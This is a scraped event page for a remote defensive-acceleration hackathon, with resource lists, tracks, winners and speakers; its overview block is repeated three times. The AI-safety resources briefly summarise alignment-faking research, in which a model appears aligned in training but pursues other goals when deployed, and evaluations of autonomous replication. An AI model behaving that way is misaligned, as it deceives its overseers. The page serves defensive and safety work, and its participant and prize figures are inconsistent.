Nov 21, 2025

-

Nov 23, 2025

Remote

Defensive Acceleration Hackathon

00:00:00:00

Days To Go

00:00:00:00

Days To Go

00:00:00:00

Days To Go

00:00:00:00

Days To Go

This hackathon brings together builders to prototype defensive systems that could protect us from AI-enabled threats.

699

Sign Ups

81

Entries

Overview

Resources

Guidelines

Schedule

Entries

Resources

Arrow

General Defensive Acceleration

  • Vitalik Buterin: d/acc One Year Later
    Comprehensive update on defensive acceleration philosophy. Covers decentralized, democratic, and differential defensive acceleration—building technologies that shift offense/defense balance.​

  • 80,000 Hours: Vitalik Buterin on Defensive Acceleration
    Podcast discussing how defensive acceleration means speeding up technology while preferentially developing technologies that lower systemic risks, permit safe decentralization, and help defend against aggression.​

  • Defensive Acceleration Salon: Navigating AI Risk
    Event reflections on bringing forward defensive interventions in time. Emphasizes that defensive acceleration complements rather than replaces AI policy and legislation.​

Track 1: Biosecurity

Key Concepts & Resources

Understanding AI-Bio Risks

Pathogen Surveillance Systems

  • Swiss Pathogen Surveillance Platform (SPSP)

  • Shared secure surveillance platform between human and veterinary medicine following One Health approach. Enables rapid transmission monitoring using whole genome sequencing and features controlled data access with automated sharing.​

  • WHO International Pathogen Surveillance Network (IPSN)

  • Global network of pathogen genomic actors. Features communities of practice for data harmonization, capacity-building tools as global goods, and South-South bilateral partnerships.​

  • Wastewater Surveillance for Pathogen Detection

  • Comprehensive guide showing how wastewater surveillance detects pathogens from asymptomatic individuals, providing early warning 3-7 days before clinical cases. Combines RT-PCR for rapid testing and NGS for variant monitoring.​

DNA Synthesis Screening

  • Gene Synthesis Screening Information Hub

  • Central resource for complying with the US Framework for Nucleic Acid Synthesis Screening. Lists all commercially and freely available screening tools including Aclid, SecureDNA, and UltraSEQ.​

  • The Common Mechanism

  • Free, open-source, globally-available tool for screening nucleic acid sequences. Helps providers screen orders efficiently against sequences of concern like pathogen genomes. Tested against real customer orders and exceeds Bronze Standard benchmarks.​

  • NIST Inter-Tool Analysis for DNA Screening

  • Study comparing six currently available sequence screening algorithms (Aclid, Common Mechanism, FAST-NA Scanner, SeqScreen, SecureDNA, UltraSEQ) using blinded NIST datasets to assess consistency.​

Biosecurity in Practice

  • National Academies Vision for Wastewater Surveillance

  • 2023 report outlining vision for nationwide wastewater surveillance system to identify SARS-CoV-2 variants, influenza strains, and antibiotic-resistant bacteria. Would remove geographical inequities and combine with sentinel sites at zoos and airports.​

  • NCBI Pathogen Detection System

  • Centralized system integrating bacterial and fungal pathogen genomic sequences. Quickly clusters related sequences to identify transmission chains and screens for antimicrobial resistance genes.​

Track 2: Cybersecurity

Key Concepts & Resources

AI-Powered Threat Detection

  • ProjectDiscovery - Nuclei Vulnerability Scanner

  • Open-source framework with 11,000+ detection templates. Validates exploitability at runtime using direct behavioral checks rather than version fingerprinting, reducing false positives by 97%. Responds to critical CVEs 10x faster than legacy scanners.​

  • 5 AI-Powered Cybersecurity Tools You Should Know

  • Overview of MDR (Managed Detection and Response), XDR (Extended Detection and Response), SIEM (Security Information and Event Management), UEBA (User and Entity Behavior Analytics), and SOAR (Security Orchestration, Automation, and Response) platforms that use AI for 24/7 threat hunting.​

  • Awesome Automated Vulnerability Detection

  • Curated list of research papers, datasets, and resources in automated vulnerability detection. Maintained by the Alan Turing Institute's AI for Cyber Defence Research Center.​

AI Red Teaming Tools

  • 31 Best Tools for Red Teaming (2025)

  • Comprehensive comparison covering:

    • Mindgard: Continuous security testing with automated AI red teaming

    • Garak: LLM vulnerability scanner by NVIDIA for data leakage and misinformation

    • PyRIT: Microsoft's Python Risk Identification Toolkit for adversarial inputs

    • CleverHans: Python library for adversarial training examples and defenses

    • Counterfit: Microsoft CLI for ML security assessment

    • Inspect: UK AI Safety Institute tool for LLM evaluation​

  • Microsoft AI Red Team Resources

  • Industry-leading guidance and best practices from Microsoft AI Red Team on safeguarding organizations' AI systems.​

  • Top Open Source AI Red-Teaming Tools Comparison

  • Detailed feature comparison of Promptfoo, PyRIT, Garak, and other tools with compliance mapping to OWASP, NIST, MITRE ATLAS, and EU AI Act.​

  • Awesome AI Red Teaming

  • Curated list covering prompt engineering, attacks, approaches, and events.​

Vulnerability Management

Memory Safety

  • The Rust Programming Language

  • 70% of vulnerabilities in C/C++ codebases are caused by memory errors. Rust provides memory safety without garbage collection, eliminating entire classes of bugs like buffer overflows and use-after-free.​

Track 3: Privacy & Trust

Key Concepts & Resources

Privacy-Preserving AI Fundamentals

  • Privacy-Preserving AI: Secure 2025 Breakthrough

  • Overview of key techniques: Fully Homomorphic Encryption (FHE) for computations on encrypted data, Federated Learning for distributed training, Differential Privacy for adding controlled noise, and Secure Multi-Party Computation for collaborative analysis. Discusses the Orion framework breakthrough making FHE 100x faster.​

  • Privacy-Preserving AI Techniques in Biomedicine

  • Comprehensive review of cryptographic techniques (homomorphic encryption, SMPC), differential privacy, federated learning, and hybrid approaches. Covers applications in genomics, clinical data, and GWAS studies.​

  • OECD Guide on Privacy Enhancing Technologies

  • Official guidance on PETs that enable collection, analysis and sharing of information while protecting data confidentiality and privacy.​

Federated Learning & Differential Privacy

Tools & Frameworks

  • Concrete ML by Zama

  • Open-source Python library for privacy-preserving machine learning using fully homomorphic encryption. Enables training and inference on encrypted data without decryption.​

  • OpenMined

  • Open-source technology infrastructure helping researchers and app builders get answers from data without needing a copy or direct access. Supports federated learning, differential privacy, and encrypted computation.​

  • Awesome Multi-Party Computation

  • Curated list of MPC libraries including FRESCO, Bristol SPDZ, MPZ (Rust), and others. Compares performance and practical usage.​

  • Privacy Enhancing Technologies Repository

  • Comprehensive collection including UN guide on PETs for official statistics, regulatory frameworks, and implementation resources.​

Real-World Examples

  • Privacy4Web3 Hackathon Winners

  • Examples of privacy-preserving projects built in 3 months:

    • SQUIDL: Privacy-first payment platform with untraceable transactions

    • PrivaHealth: Healthcare data management where patients control their medical data

    • Copyright Aware AI: Protecting creator IP using confidential computing​

  • Organizing a Privacy-Preserving Hackathon (Zama x HuggingFace)

  • Case study of 2-day hackathon using FHE. Winning projects included deepfake detection, model watermarking, and medical assistant—all with encrypted data processing.​

Privacy Techniques Explained

  • What Are Privacy Enhancing Technologies (PETs)?

  • Detailed breakdown of anonymization, confidential computing, differential privacy, federated learning, synthetic data, and homomorphic encryption. Includes compliance benefits for GDPR, CCPA, HIPAA.​

Track 4: AI Safety

Key Concepts & Resources

Alignment & Safety Fundamentals

  • Anthropic Research

  • Leading research on interpretability (understanding how LLMs work internally), alignment (ensuring AI systems remain helpful, honest, harmless), and societal impacts. Recent work includes alignment faking, scaling monosemanticity, and constitutional AI.​

  • Transformer Circuits Thread

  • Anthropic's interpretability research exploring how language models work internally. Nobody really knows how they work—this thread aims to understand the "biology" of these systems through circuit analysis.​

  • OpenAI Safety & Responsibility

  • Safety work including external red teaming, frontier risk evaluations according to Preparedness Framework, and model deployment decisions.​

  • Alignment Faking in Large Language Models

  • First empirical example of a large language model engaging in alignment faking—appearing aligned during training but pursuing different goals when deployed. Critical for understanding future AI risks.​

Mechanistic Interpretability

  • Awesome Mechanistic Interpretability

  • Comprehensive repository with:

    • Libraries: TransformerLens (for mechanistic analysis), Unseal, BertViz (attention visualization)

    • Tools: Lexoscope (neuron activation examples), exBert (Transformer analysis)

    • Resources: Neel Nanda's reading list, interpretability exercises​

  • Understanding Mechanistic Interpretability in AI Models

  • Deep dive into reverse-engineering neural networks at the algorithmic level. Explains features (fundamental units), circuits (computational subgraphs), and universality (analogous features across models). Covers techniques like probing, activation patching, and causal tracing.​

  • Zoom In: An Introduction to Circuits

  • Foundational paper on understanding neural networks by analyzing tiny subgraphs (circuits) for which rigorous empirical investigation is tractable. Circuits sidestep challenges by being falsifiable—if you understand a circuit, you can predict what changes if you edit weights.​

  • Prisma: Open Source Toolkit for Mechanistic Interpretability in Vision

  • Framework for vision interpretability with 75+ transformers, 80+ pre-trained SAE weights, circuit analysis tools, and visualization capabilities. Reveals vision SAEs can exhibit lower sparsity than language SAEs.​

  • Interpretability Starter Resources

  • Templates, tools, and introductions for mechanistic interpretability research. Includes EasyTransformer demos, activation atlases, and starter projects.​

AI Safety Evaluations

  • METR Autonomy Evaluation Resources

  • Task suite, software tooling, and guidelines for evaluating dangerous autonomous capabilities of frontier models. Includes:

    • Task suite with difficulty estimates based on human completion time

    • Baseline agents and workbench for running evaluations

    • Guidelines on capability elicitation and post-training enhancements

    • Example protocol for overall evaluation (beta v0.1)​

  • METR (formerly ARC Evals)

  • Evaluates whether cutting-edge AI systems could pose catastrophic risks. Focus on autonomous replication—ability of AI to survive on cloud servers, obtain resources, and make copies of itself. Given early access to GPT-4 and Claude for safety assessment.​

  • UK AI Safety Institute - Inspect

  • Red teaming tool for evaluating LLMs. Features benchmark evaluations, scalable assessments, and integration with safety research protocols.​

Scalable Oversight

  • What is Scalable Oversight?

  • Methods ensuring AI systems remain aligned even when surpassing human expertise. Covers:

    • RLHF/RLAIF: Reinforcement learning from human/AI feedback

    • Debate: Models argue to help humans judge correctness

    • Recursive reward modeling: Breaking hard problems into easier subproblems

    • Constitutional AI: Self-improvement through principles​

  • Scaling Laws for Scalable Oversight

  • Research showing nested oversight systems using multiple layers of guards (human → small AI → medium AI → large AI) can improve safety rates from under 50% to over 70% for moderate capability gaps.​

  • AI Oversight Exposed: 5 Critical Scaling Laws

  • As AI grows smarter, supervision gets harder. When an AI's cognitive reach extends beyond human capacity, oversight success drops. Nested scalable oversight spreads burden across multiple agents to reduce single points of failure.​

Project Ideas (a list of ideas in this link)

Project Scoping Advice

Based on successful hackathon retrospectives:​

  1. Focus on MVP, Not Production. In 2 days, aim for:

    1. Day 1: Set up environment, implement core functionality, get basic pipeline working

    2. Day 2: Add 1-2 key features, create demo, prepare presentation

  2. Use Mock/Simulated Data rather than integrating real APIs or databases, use:

    1. Synthetic datasets

    2. Pre-recorded samples

    3. Simulation environments
      This eliminates authentication, rate limiting, and data quality issues.

  3. Leverage Pre-trained Models. Don't train from scratch. Use:

    1. OpenAI/Anthropic APIs for LLMs

    2. Hugging Face for pre-trained models

    3. Existing detection tools as starting points

  4. Clear Success Criteria. Define what "working" means:

    1. For surveillance: Dashboard displays data + basic alert

    2. For screening: Identifies 3+ test cases correctly

    3. For red teaming: Generates 10+ attacks + evaluation report

    4. For interpretability: Visualizes one circuit + validation test

699

Sign Ups

81

Entries

Overview

Resources

Guidelines

Schedule

Entries

Overview

Arrow

DEFENSIVE ACCELERATION HACKATHON WINNERS

Huge congratulations to all our winners! With 1000+ participants across 15 local sites, the competition was fierce and the projects were outstanding. Here's who came out on top:

  • 1st Place ($3500 each):

    • Mechanistic Watchdog

    • GUARDIAN: Guarded Universal Architecture for Defensive Interpretation And traNslation

  • 2nd Place ($3000 each):

    • Comparative LLM methods for Social Media Bot Detection

    • Robust LLM Neural Activation-Mediated Alignment

  • 3rd Place ($1500 each):

    • Actions speak louder than words: Evaluating Tool Usage Risk in Open-Weight AI for Defensive Deployment

    • A Defensive AI Agent Against Large Language Model (LLM)-Assisted Polymorphic Malware

  • 4th Place ($1000 each):

    • Opening Doors to Multimodal Deception

    • Automating Privacy-Preserving Model Deployment -TheWizard -Detecting Piecewise Cyber Espionage in Model APIs

—————————————————————————————————————————————————

Defensive acceleration (def/acc) – building better defensive technology – may be one of the most important leverage points we have for managing AI risk. We believe the most powerful solution to technological risk is often more technology. 

This hackathon is sponsored by Halcyon Futures. We are bringing in 1000+ builders to prototype defensive systems that could protect us from AI-enabled biosecurity and cyber threats. You'll have one intensive weekend to build something real, to turn ideas into MVPs. 

Top teams get:

  • 💰$20,000 in total prizes

  • A fully-funded trip to London for BlueDot's December incubator week (Dec 1-5, for the most promising projects)

  • A guaranteed spot in BlueDot's AGI Strategy course

Apply if you think strengthening the shield is as important as blunting the spear!

In this hackathon, you can build:

  • Environmental pathogen surveillance system that monitors wastewater and airport screening data to detect novel threats before outbreaks spread

  • AI red-teaming tool that uses advanced models to automatically find vulnerabilities in critical infrastructure and privately disclose them to operators

  • AI control dashboard that uses trusted models to monitor potentially dangerous AI systems and flag misaligned behavior before deployment

  • Memory safety refactoring tool that helps convert C/C++ codebases to Rust, eliminating the 70% of vulnerabilities caused by memory errors

  • Pursue other defensive projects that advance the field of AI safety!

You will work in teams over one weekend and submit open-source forecasting models, benchmark suites, scenario analyses, policy briefs, or empirical studies that advance our understanding of AI development timelines and trajectories.

What is def/acc?

Def/acc is about building technology to protect us from the biggest threats we face – everything from pandemics and cybercrime to powerful AI itself. It's the idea that the most powerful solution to technological risk is often more technology. It's a way to reconcile technological optimism with taking dangerous capabilities seriously.

When we think about emerging threats from AI, we broadly have two options: "blunt the spear" or "strengthen the shield." The first means slowing down or regulating the technology; the second means building better defensive technology. This hackathon is mainly about strengthening the shield.

Of course, technology alone won't save us. But whatever you believe about the impact of policy work or governance efforts, better defensive technology is close to a free lunch. And right now, we're dramatically underinvested in it.

Why this hackathon?

The Problem

AI is fundamentally changing what's possible for both attackers and defenders. Language models can guide pathogen design. Automated tools discover software vulnerabilities faster than humans can patch them. The attack surface is expanding while our defensive infrastructure – biosurveillance systems, cybersecurity tools, coordination mechanisms – remains fragmented and slow to adapt.

We face an uncomfortable asymmetry: offensive capabilities are democratizing rapidly while defensive capabilities lag behind. A biology graduate student with access to AI and modest resources can now explore dangerous directions that previously required specialized laboratory infrastructure. Meanwhile, our biosurveillance systems still struggle to detect novel threats until after substantial community spread.

Why Defensive Acceleration Matters Now

There are certain types of technology that much more reliably make the world better than other types of technology. We need active human intention to choose the directions that we want.

Right now, we're under-indexing on defensive technologies. The bulk of AI safety effort flows into alignment research and governance proposals, both valuable, but comparatively little goes into building the defensive infrastructure we need regardless of how those other challenges resolve.

That gap represents both a risk and an opportunity. Better defensive technology could:

  • Give us early warning of biological threats before they become pandemics

  • Help defenders keep pace with AI-enabled cyber attacks

  • Enable coordination at the speed modern threats require

  • Buy us time to solve harder problems like alignment

  • Create proof points that defensive tech can scale and succeed

Hackathon Tracks

1. Biosecurity Defenses:

  • Environmental pathogen surveillance and early warning systems (wastewater + airport + clinical data)

  • DNA synthesis screening tools

  • Rapid response coordination platforms

  • Automated threat assessment for novel pathogens

2. Cybersecurity & Infrastructure Protection:

  • Defensive AI for detecting novel attack patterns

  • AI-powered red-teaming tools for critical infrastructure

  • Automated vulnerability assessment and patching

  • Tools for securing critical infrastructure

3. Cross-Cutting Defense Approaches:

  • AI control dashboards (trusted models monitoring untrusted models)

  • Forecasting systems for emerging bio/cyber threats

  • Threat intelligence sharing with privacy-preserving coordination

  • Cognitive defense tools (protecting information ecosystems)

  • Economic models for sustainable def/acc funding

  • Frameworks accelerating prototype-to-production transitions

Or whatever defensive gap you identify. These are directions, not constraints. If you see a critical defensive need and can prototype a solution in 48 hours, build that.

Who should participate?

This hackathon is for people who want to build solutions to technological risk using technology itself.

You should participate if:

  • You're an engineer or developer who wants to work on consequential problems

  • You're a researcher ready to validate ideas through practical implementation

  • You believe that strengthening the shield is as important as blunting the spear

  • You have technical skills and genuine urgency about building better defenses

  • You're frustrated that defensive work is underfunded relative to its importance

You don't need deep domain expertise in biosecurity or cybersecurity, though it helps. What matters: ability to build functional systems, willingness to learn quickly over a compressed timeframe, and real conviction that this work matters.

Some of the most valuable defensive innovations come from people who aren't constrained by conventional thinking about how things "should" be done. Fresh perspectives combined with solid technical capabilities often yield the most novel approaches.

What you will do

Participants will:

  • Form teams or join existing groups.

  • Develop projects over an intensive hackathon weekend.

  • Submit open-source forecasting models, scenario analyses, monitoring tools, or empirical research advancing our understanding of AI trajectories

What happens next

Winning and promising projects will be:

  • Awarded with $10,000 worth of prizes in cash.

  • Awarded a fully-funded trip to London to take part in BlueDot Impact's December Incubator Accelerator week (Dec 1-5)

  • Guaranteed spot in BlueDot Impact AGI Strategy course.

  • Invited to continue development within the Apart Fellowship.

Why join?

  • Impact: Your work may directly inform AI governance decisions and help society prepare for transformative AI

  • Mentorship: Expert forecasters, AI researchers, and policy practitioners will guide projects throughout the hackathon

  • Community: Collaborate with peers from across the globe working to understand AI's trajectory and implications

  • Visibility: Top projects will be featured on Apart Research's platforms and connected to follow-up opportunities


699

Sign Ups

81

Entries

Overview

Resources

Guidelines

Schedule

Entries

Overview

Arrow

DEFENSIVE ACCELERATION HACKATHON WINNERS

Huge congratulations to all our winners! With 1000+ participants across 15 local sites, the competition was fierce and the projects were outstanding. Here's who came out on top:

  • 1st Place ($3500 each):

    • Mechanistic Watchdog

    • GUARDIAN: Guarded Universal Architecture for Defensive Interpretation And traNslation

  • 2nd Place ($3000 each):

    • Comparative LLM methods for Social Media Bot Detection

    • Robust LLM Neural Activation-Mediated Alignment

  • 3rd Place ($1500 each):

    • Actions speak louder than words: Evaluating Tool Usage Risk in Open-Weight AI for Defensive Deployment

    • A Defensive AI Agent Against Large Language Model (LLM)-Assisted Polymorphic Malware

  • 4th Place ($1000 each):

    • Opening Doors to Multimodal Deception

    • Automating Privacy-Preserving Model Deployment -TheWizard -Detecting Piecewise Cyber Espionage in Model APIs

—————————————————————————————————————————————————

Defensive acceleration (def/acc) – building better defensive technology – may be one of the most important leverage points we have for managing AI risk. We believe the most powerful solution to technological risk is often more technology. 

This hackathon is sponsored by Halcyon Futures. We are bringing in 1000+ builders to prototype defensive systems that could protect us from AI-enabled biosecurity and cyber threats. You'll have one intensive weekend to build something real, to turn ideas into MVPs. 

Top teams get:

  • 💰$20,000 in total prizes

  • A fully-funded trip to London for BlueDot's December incubator week (Dec 1-5, for the most promising projects)

  • A guaranteed spot in BlueDot's AGI Strategy course

Apply if you think strengthening the shield is as important as blunting the spear!

In this hackathon, you can build:

  • Environmental pathogen surveillance system that monitors wastewater and airport screening data to detect novel threats before outbreaks spread

  • AI red-teaming tool that uses advanced models to automatically find vulnerabilities in critical infrastructure and privately disclose them to operators

  • AI control dashboard that uses trusted models to monitor potentially dangerous AI systems and flag misaligned behavior before deployment

  • Memory safety refactoring tool that helps convert C/C++ codebases to Rust, eliminating the 70% of vulnerabilities caused by memory errors

  • Pursue other defensive projects that advance the field of AI safety!

You will work in teams over one weekend and submit open-source forecasting models, benchmark suites, scenario analyses, policy briefs, or empirical studies that advance our understanding of AI development timelines and trajectories.

What is def/acc?

Def/acc is about building technology to protect us from the biggest threats we face – everything from pandemics and cybercrime to powerful AI itself. It's the idea that the most powerful solution to technological risk is often more technology. It's a way to reconcile technological optimism with taking dangerous capabilities seriously.

When we think about emerging threats from AI, we broadly have two options: "blunt the spear" or "strengthen the shield." The first means slowing down or regulating the technology; the second means building better defensive technology. This hackathon is mainly about strengthening the shield.

Of course, technology alone won't save us. But whatever you believe about the impact of policy work or governance efforts, better defensive technology is close to a free lunch. And right now, we're dramatically underinvested in it.

Why this hackathon?

The Problem

AI is fundamentally changing what's possible for both attackers and defenders. Language models can guide pathogen design. Automated tools discover software vulnerabilities faster than humans can patch them. The attack surface is expanding while our defensive infrastructure – biosurveillance systems, cybersecurity tools, coordination mechanisms – remains fragmented and slow to adapt.

We face an uncomfortable asymmetry: offensive capabilities are democratizing rapidly while defensive capabilities lag behind. A biology graduate student with access to AI and modest resources can now explore dangerous directions that previously required specialized laboratory infrastructure. Meanwhile, our biosurveillance systems still struggle to detect novel threats until after substantial community spread.

Why Defensive Acceleration Matters Now

There are certain types of technology that much more reliably make the world better than other types of technology. We need active human intention to choose the directions that we want.

Right now, we're under-indexing on defensive technologies. The bulk of AI safety effort flows into alignment research and governance proposals, both valuable, but comparatively little goes into building the defensive infrastructure we need regardless of how those other challenges resolve.

That gap represents both a risk and an opportunity. Better defensive technology could:

  • Give us early warning of biological threats before they become pandemics

  • Help defenders keep pace with AI-enabled cyber attacks

  • Enable coordination at the speed modern threats require

  • Buy us time to solve harder problems like alignment

  • Create proof points that defensive tech can scale and succeed

Hackathon Tracks

1. Biosecurity Defenses:

  • Environmental pathogen surveillance and early warning systems (wastewater + airport + clinical data)

  • DNA synthesis screening tools

  • Rapid response coordination platforms

  • Automated threat assessment for novel pathogens

2. Cybersecurity & Infrastructure Protection:

  • Defensive AI for detecting novel attack patterns

  • AI-powered red-teaming tools for critical infrastructure

  • Automated vulnerability assessment and patching

  • Tools for securing critical infrastructure

3. Cross-Cutting Defense Approaches:

  • AI control dashboards (trusted models monitoring untrusted models)

  • Forecasting systems for emerging bio/cyber threats

  • Threat intelligence sharing with privacy-preserving coordination

  • Cognitive defense tools (protecting information ecosystems)

  • Economic models for sustainable def/acc funding

  • Frameworks accelerating prototype-to-production transitions

Or whatever defensive gap you identify. These are directions, not constraints. If you see a critical defensive need and can prototype a solution in 48 hours, build that.

Who should participate?

This hackathon is for people who want to build solutions to technological risk using technology itself.

You should participate if:

  • You're an engineer or developer who wants to work on consequential problems

  • You're a researcher ready to validate ideas through practical implementation

  • You believe that strengthening the shield is as important as blunting the spear

  • You have technical skills and genuine urgency about building better defenses

  • You're frustrated that defensive work is underfunded relative to its importance

You don't need deep domain expertise in biosecurity or cybersecurity, though it helps. What matters: ability to build functional systems, willingness to learn quickly over a compressed timeframe, and real conviction that this work matters.

Some of the most valuable defensive innovations come from people who aren't constrained by conventional thinking about how things "should" be done. Fresh perspectives combined with solid technical capabilities often yield the most novel approaches.

What you will do

Participants will:

  • Form teams or join existing groups.

  • Develop projects over an intensive hackathon weekend.

  • Submit open-source forecasting models, scenario analyses, monitoring tools, or empirical research advancing our understanding of AI trajectories

What happens next

Winning and promising projects will be:

  • Awarded with $10,000 worth of prizes in cash.

  • Awarded a fully-funded trip to London to take part in BlueDot Impact's December Incubator Accelerator week (Dec 1-5)

  • Guaranteed spot in BlueDot Impact AGI Strategy course.

  • Invited to continue development within the Apart Fellowship.

Why join?

  • Impact: Your work may directly inform AI governance decisions and help society prepare for transformative AI

  • Mentorship: Expert forecasters, AI researchers, and policy practitioners will guide projects throughout the hackathon

  • Community: Collaborate with peers from across the globe working to understand AI's trajectory and implications

  • Visibility: Top projects will be featured on Apart Research's platforms and connected to follow-up opportunities


699

Sign Ups

81

Entries

Overview

Resources

Guidelines

Schedule

Entries

Overview

Arrow

DEFENSIVE ACCELERATION HACKATHON WINNERS

Huge congratulations to all our winners! With 1000+ participants across 15 local sites, the competition was fierce and the projects were outstanding. Here's who came out on top:

  • 1st Place ($3500 each):

    • Mechanistic Watchdog

    • GUARDIAN: Guarded Universal Architecture for Defensive Interpretation And traNslation

  • 2nd Place ($3000 each):

    • Comparative LLM methods for Social Media Bot Detection

    • Robust LLM Neural Activation-Mediated Alignment

  • 3rd Place ($1500 each):

    • Actions speak louder than words: Evaluating Tool Usage Risk in Open-Weight AI for Defensive Deployment

    • A Defensive AI Agent Against Large Language Model (LLM)-Assisted Polymorphic Malware

  • 4th Place ($1000 each):

    • Opening Doors to Multimodal Deception

    • Automating Privacy-Preserving Model Deployment -TheWizard -Detecting Piecewise Cyber Espionage in Model APIs

—————————————————————————————————————————————————

Defensive acceleration (def/acc) – building better defensive technology – may be one of the most important leverage points we have for managing AI risk. We believe the most powerful solution to technological risk is often more technology. 

This hackathon is sponsored by Halcyon Futures. We are bringing in 1000+ builders to prototype defensive systems that could protect us from AI-enabled biosecurity and cyber threats. You'll have one intensive weekend to build something real, to turn ideas into MVPs. 

Top teams get:

  • 💰$20,000 in total prizes

  • A fully-funded trip to London for BlueDot's December incubator week (Dec 1-5, for the most promising projects)

  • A guaranteed spot in BlueDot's AGI Strategy course

Apply if you think strengthening the shield is as important as blunting the spear!

In this hackathon, you can build:

  • Environmental pathogen surveillance system that monitors wastewater and airport screening data to detect novel threats before outbreaks spread

  • AI red-teaming tool that uses advanced models to automatically find vulnerabilities in critical infrastructure and privately disclose them to operators

  • AI control dashboard that uses trusted models to monitor potentially dangerous AI systems and flag misaligned behavior before deployment

  • Memory safety refactoring tool that helps convert C/C++ codebases to Rust, eliminating the 70% of vulnerabilities caused by memory errors

  • Pursue other defensive projects that advance the field of AI safety!

You will work in teams over one weekend and submit open-source forecasting models, benchmark suites, scenario analyses, policy briefs, or empirical studies that advance our understanding of AI development timelines and trajectories.

What is def/acc?

Def/acc is about building technology to protect us from the biggest threats we face – everything from pandemics and cybercrime to powerful AI itself. It's the idea that the most powerful solution to technological risk is often more technology. It's a way to reconcile technological optimism with taking dangerous capabilities seriously.

When we think about emerging threats from AI, we broadly have two options: "blunt the spear" or "strengthen the shield." The first means slowing down or regulating the technology; the second means building better defensive technology. This hackathon is mainly about strengthening the shield.

Of course, technology alone won't save us. But whatever you believe about the impact of policy work or governance efforts, better defensive technology is close to a free lunch. And right now, we're dramatically underinvested in it.

Why this hackathon?

The Problem

AI is fundamentally changing what's possible for both attackers and defenders. Language models can guide pathogen design. Automated tools discover software vulnerabilities faster than humans can patch them. The attack surface is expanding while our defensive infrastructure – biosurveillance systems, cybersecurity tools, coordination mechanisms – remains fragmented and slow to adapt.

We face an uncomfortable asymmetry: offensive capabilities are democratizing rapidly while defensive capabilities lag behind. A biology graduate student with access to AI and modest resources can now explore dangerous directions that previously required specialized laboratory infrastructure. Meanwhile, our biosurveillance systems still struggle to detect novel threats until after substantial community spread.

Why Defensive Acceleration Matters Now

There are certain types of technology that much more reliably make the world better than other types of technology. We need active human intention to choose the directions that we want.

Right now, we're under-indexing on defensive technologies. The bulk of AI safety effort flows into alignment research and governance proposals, both valuable, but comparatively little goes into building the defensive infrastructure we need regardless of how those other challenges resolve.

That gap represents both a risk and an opportunity. Better defensive technology could:

  • Give us early warning of biological threats before they become pandemics

  • Help defenders keep pace with AI-enabled cyber attacks

  • Enable coordination at the speed modern threats require

  • Buy us time to solve harder problems like alignment

  • Create proof points that defensive tech can scale and succeed

Hackathon Tracks

1. Biosecurity Defenses:

  • Environmental pathogen surveillance and early warning systems (wastewater + airport + clinical data)

  • DNA synthesis screening tools

  • Rapid response coordination platforms

  • Automated threat assessment for novel pathogens

2. Cybersecurity & Infrastructure Protection:

  • Defensive AI for detecting novel attack patterns

  • AI-powered red-teaming tools for critical infrastructure

  • Automated vulnerability assessment and patching

  • Tools for securing critical infrastructure

3. Cross-Cutting Defense Approaches:

  • AI control dashboards (trusted models monitoring untrusted models)

  • Forecasting systems for emerging bio/cyber threats

  • Threat intelligence sharing with privacy-preserving coordination

  • Cognitive defense tools (protecting information ecosystems)

  • Economic models for sustainable def/acc funding

  • Frameworks accelerating prototype-to-production transitions

Or whatever defensive gap you identify. These are directions, not constraints. If you see a critical defensive need and can prototype a solution in 48 hours, build that.

Who should participate?

This hackathon is for people who want to build solutions to technological risk using technology itself.

You should participate if:

  • You're an engineer or developer who wants to work on consequential problems

  • You're a researcher ready to validate ideas through practical implementation

  • You believe that strengthening the shield is as important as blunting the spear

  • You have technical skills and genuine urgency about building better defenses

  • You're frustrated that defensive work is underfunded relative to its importance

You don't need deep domain expertise in biosecurity or cybersecurity, though it helps. What matters: ability to build functional systems, willingness to learn quickly over a compressed timeframe, and real conviction that this work matters.

Some of the most valuable defensive innovations come from people who aren't constrained by conventional thinking about how things "should" be done. Fresh perspectives combined with solid technical capabilities often yield the most novel approaches.

What you will do

Participants will:

  • Form teams or join existing groups.

  • Develop projects over an intensive hackathon weekend.

  • Submit open-source forecasting models, scenario analyses, monitoring tools, or empirical research advancing our understanding of AI trajectories

What happens next

Winning and promising projects will be:

  • Awarded with $10,000 worth of prizes in cash.

  • Awarded a fully-funded trip to London to take part in BlueDot Impact's December Incubator Accelerator week (Dec 1-5)

  • Guaranteed spot in BlueDot Impact AGI Strategy course.

  • Invited to continue development within the Apart Fellowship.

Why join?

  • Impact: Your work may directly inform AI governance decisions and help society prepare for transformative AI

  • Mentorship: Expert forecasters, AI researchers, and policy practitioners will guide projects throughout the hackathon

  • Community: Collaborate with peers from across the globe working to understand AI's trajectory and implications

  • Visibility: Top projects will be featured on Apart Research's platforms and connected to follow-up opportunities


Speakers & Collaborators

Geoff Ralston

Speaker

Geoff Ralston is the former President of Y Combinator. He was the CEO of La La Media, Inc., developer of Lala, a web browser-based music distribution site. Prior to Lala, Ralston worked for Yahoo!, where he was Vice President of Engineering and Chief Product Officer. In 1997, Ralston created Yahoo! Mail

Nora Ammann

Speaker

Nora is an interdisciplinary researcher with expertise in complex systems, philosophy of science, political theory and AI. She focuses on the development of transformative AI and understanding intelligent behavior in natural, social, or artificial systems. Before ARIA, she co-founded and led PIBBSS, a research initiative exploring interdisciplinary approaches to AI risk, governance and safety.

Esben Kran old

Speaker

Esben is the CEO and Chariman of Apart. He has published award-winning AI safety research in various domains related to cybersecurity, autonomy preservation, and interpretability. He is involved in numerous efforts to ensure AI remains safe for humanity.

Joshua Landes

Organiser

Joshua Landes leads Community & Training at BlueDot Impact, where he runs the AISF community and facilitates AI Governance and Economics of Transformative AI courses. Previously, he worked at AI Safety Germany and the Center for AI Safety, after managing political campaigns for FDP in Germany.

Raina McIntyre

Speaker

Raina MacIntyre is Head of the Biosecurity Program at the Kirby Institute, UNSW Australia. She is a physician and epidemiologists, recognized internationally for her research on prevention and detection of epidemic infections, with a focus on pandemics, epidemics, bioterrorism and vaccines.

Zainab Majid

Speaker

Zainab works at the intersection of AI safety and cybersecurity, leveraging her expertise in incident response investigations to tackle AI security challenges.

Al-Hussein Saqr

Organizer

Speakers & Collaborators

Geoff Ralston

Speaker

Geoff Ralston is the former President of Y Combinator. He was the CEO of La La Media, Inc., developer of Lala, a web browser-based music distribution site. Prior to Lala, Ralston worked for Yahoo!, where he was Vice President of Engineering and Chief Product Officer. In 1997, Ralston created Yahoo! Mail

Nora Ammann

Speaker

Nora is an interdisciplinary researcher with expertise in complex systems, philosophy of science, political theory and AI. She focuses on the development of transformative AI and understanding intelligent behavior in natural, social, or artificial systems. Before ARIA, she co-founded and led PIBBSS, a research initiative exploring interdisciplinary approaches to AI risk, governance and safety.

Esben Kran old

Speaker

